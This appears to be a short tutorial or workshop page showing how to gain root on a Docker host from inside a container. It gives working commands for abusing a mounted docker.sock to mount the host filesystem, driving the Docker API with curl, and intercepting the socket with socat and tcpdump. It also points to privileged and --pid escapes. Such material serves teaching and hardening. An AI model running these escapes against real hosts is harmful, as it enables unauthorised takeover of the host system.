Gaining root access to a DOCKER Host

1. Via /var/run/docker.sock mount

docker run -it -v /var/run/docker.sock:/container/mypath/docker.sock ubuntu

apt-get update
apt-get install -y docker.io

docker -H unix://container/mypath/docker.sock ps

Inside the container ...

docker -H unix://container/mypath/docker.sock run  -it -v /:/mnt/host ubuntu bash
   cat /mnt/host/etc/hostname
   exit

Is this unusal ?? Nope

Check out https://www.portainer.io/installation/ ... any questions? :-)

Something tricky

apt-get update
apt-get install -y curl jq

curl --unix-socket /container/mypath/docker.sock http://localhost/v1.41/version

ID=$(curl -XPOST --unix-socket /container/mypath/docker.sock -d '{"Image":"docker.io/library/nginx:latest"}' -H 'Content-Type: application/json' http://localhost/v1.41/containers/create |  jq -r .Id)

curl -XPOST --unix-socket /container/mypath/docker.sock  -H 'Content-Type: application/json' http://localhost/v1.41/containers/$ID/start 

curl -XGET --unix-socket /container/mypath/docker.sock  -H 'Content-Type: application/json' http://localhost/v1.41/containers/json

2. Intercepting /var/run/docker.sock

# backup the socket
sudo mv /var/run/docker.sock /var/run/docker.sock.original

# use tcp port 8089 proxy the original socket
sudo socat TCP-LISTEN:8089,reuseaddr,fork UNIX-CONNECT:/var/run/docker.sock.original

# use the new socket to proxy the 8089 port
sudo socat UNIX-LISTEN:/var/run/docker.sock,fork TCP-CONNECT:127.0.0.1:8089

# In another terminal
sudo tcpdump -i lo -A port 8089

#in another terminal
docker ps

3. Via mounting "dangerous" locations

see /examples/host_mount see /addons/pod_escape_log.md

4. Via --priviledged (1)

Check out this. https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1

5. Via --pid

Use a standard ubuntu image with nsenter / lsns ....

Previousexamples Nexthost_mount

Last updated 2 years ago